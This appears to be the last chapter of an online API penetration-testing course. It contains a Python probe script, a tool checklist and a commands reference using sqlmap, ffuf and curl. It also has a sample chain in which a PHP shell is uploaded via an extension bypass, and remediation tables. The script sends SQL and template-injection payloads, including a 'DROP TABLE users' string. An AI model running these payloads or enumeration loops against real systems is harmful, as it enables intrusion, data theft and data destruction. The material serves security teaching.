Full API Pentest

๐Ÿ”ฅ Vibe Prompt

"Run an automated pentest on a target API. Check: auth, IDOR, rate limiting, mass assignment, injection."

import requests

BASE = "http://target.api.com"
findings = []

# 1. Auth Bypass
r = requests.get(f"{BASE}/admin", headers={"Authorization": "Bearer invalid"})
if r.status_code == 200:
    findings.append("CRITICAL: Auth bypass!")

# 2. IDOR (Insecure Direct Object Reference)
r = requests.get(f"{BASE}/api/orders/1", headers={"Authorization": "Bearer valid_token"})
if r.status_code == 200:
    r2 = requests.get(f"{BASE}/api/orders/2", headers={"Authorization": "Bearer valid_token"})
    if r2.status_code == 200 and r2.json()["user_id"] != "current_user":
        findings.append("HIGH: IDOR - can access other users' orders!")

# 3. Rate Limiting
for _ in range(100):
    r = requests.post(f"{BASE}/api/login", json={"user": "admin", "pass": "wrong"})
    if r.status_code != 429:
        pass  # No rate limit

# 4. Mass Assignment
r = requests.post(f"{BASE}/api/user/profile", json={"name": "test", "role": "admin"}, headers={"Authorization": "Bearer token"})
if r.status_code == 200:
    findings.append("MEDIUM: Mass Assignment - role parameter accepted!")

# 5. Injection in API params
sqli_payloads = ["' OR 1=1--", "'; DROP TABLE users--", "${7*7}"]
for payload in sqli_payloads:
    r = requests.get(f"{BASE}/api/search?q={payload}")
    if "error" not in r.text.lower() and r.status_code == 200:
        findings.append(f"MEDIUM: Possible injection: {payload}")

for f in findings:
    print(f"โš ๏ธ  {f}")

API Pentest Checklist

| Check | Tool | |-------|------| | Auth bypass | Burp Repeater | | IDOR | Manual UUID increment | | Rate limiting | Bombardier | | Mass assignment | Add unexpected fields | | Injection | sqlmap | | JWT | jwt_tool |

API Pentest Course Complete! ๐ŸŽ‰

  • โœ… Recon
  • โœ… Auth Bypass
  • โœ… SQLi/NoSQLi
  • โœ… JWT/Session
  • โœ… Full Pentest

Key Points

  • Understand the core concepts thoroughly
  • Practice with hands-on code examples
  • Apply knowledge to real-world problems
  • Review and reinforce through exercises

Further Learning

  • Official documentation
  • Open source projects on GitHub
  • Community forums and discussions
  • Related courses and tutorials

Pentest Checklist

Reconnaissance

  • [ ] Enumerate subdomains (subfinder, amass)
  • [ ] Detect technology stack (wappalyzer, whatweb)
  • [ ] Find API documentation (Swagger, OpenAPI, GraphQL introspection)
  • [ ] Extract endpoints from JavaScript files (LinkFinder)
  • [ ] Check .well-known endpoints

Discovery

  • [ ] Fuzz API routes (Kiterunner, ffuf)
  • [ ] Identify authentication mechanisms
  • [ ] Discover hidden parameters (arjun)
  • [ ] Test HTTP methods on all endpoints
  • [ ] Check for CORS misconfiguration

Vulnerability Testing

  • [ ] SQL injection (sqlmap)
  • [ ] NoSQL injection (manual payloads)
  • [ ] XSS (dalfox)
  • [ ] IDOR (manual + automated)
  • [ ] Mass assignment (test extra fields)
  • [ ] JWT attacks (jwt_tool)
  • [ ] Rate limiting bypass
  • [ ] SSRF (test redirects, internal services)
  • [ ] Path traversal
  • [ ] Server-side template injection

Exploitation

  • [ ] Extract sensitive data
  • [ ] Escalate privileges
  • [ ] Access other users' data
  • [ ] Document proof of concept

Reporting

  • [ ] Write executive summary
  • [ ] Detail each finding with CVSS score
  • [ ] Include request/response evidence
  • [ ] Provide remediation steps
  • [ ] Prioritize by severity

Sample Exploitation Chain

1. Discovery: Found /api/upload endpoint via fuzzing
2. Testing: Uploaded PHP file, got 403 (extension blocked)
3. Bypass: Changed extension .php5 โ€” got 200
4. Access: Accessed uploaded file at /uploads/shell.php5
5. Escalation: Executed commands on server
6. Impact: Full database access, 50k records extracted

Summary

A complete pentest follows a structured methodology: recon, discovery, vulnerability testing, exploitation, and reporting. Each finding includes evidence and remediation.

Key takeaways: | Methodology: recon -> discovery -> vulnerability testing -> exploitation -> reporting | | Tools: subfinder, kiterunner, sqlmap, jwt_tool, ffuf, burp suite | | Exploitation chain: find endpoint -> test -> bypass -> access -> escalate | | Reporting: executive summary, detailed findings with CVSS, evidence, remediation |

You have completed the API security pentesting course.

Remediation Timeline

| Priority | Timeline | Actions | |----------|----------|---------| | Critical | 24 hours | Fix SQL injection, mass assignment | | High | 1 week | Add rate limiting, JWT hardening | | Medium | 2 weeks | Add security headers, input validation | | Low | 1 month | Server hardening, documentation |

You have completed the API security pentesting course.

Full Pentest Commands Reference

# 1. Recon
subfinder -d example.com | httpx

# 2. Discovery
ffuf -w api-endpoints.txt -u https://api.example.com/FUZZ

# 3. SQL Injection
sqlmap -u "https://api.example.com/users?id=1" --batch --dbs

# 4. XSS
dalfox url https://api.example.com/search?q=test

# 5. JWT
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

# 6. IDOR
for id in {1..100}; do curl -s -o /dev/null -w "%{http_code}
" -H "Authorization: Bearer $TOKEN" "https://api.example.com/api/users/$id"; done | sort | uniq -c

# 7. Rate Limiting
for i in {1..200}; do curl -s -o /dev/null -w "%{http_code}
" https://api.example.com/api/public; done | sort | uniq -c

Next Steps

| Activity | Description | |----------|-------------| | Practice | Set up a vulnerable API lab (DVWA, WebGoat) | | Certifications | Take GPEN, OSCP, or PNPT | | Bug Bounties | Apply skills on HackerOne, Bugcrowd | | Build Tools | Create your own pentest automation scripts |

You have completed the course. You now understand API security pentesting from reconnaissance to reporting.

Unlock Full Tutorial

This chapter is paid content. Join the project to unlock over 5000 words of deep analysis, including 10+ god-tier Prompts and real Source Code examples!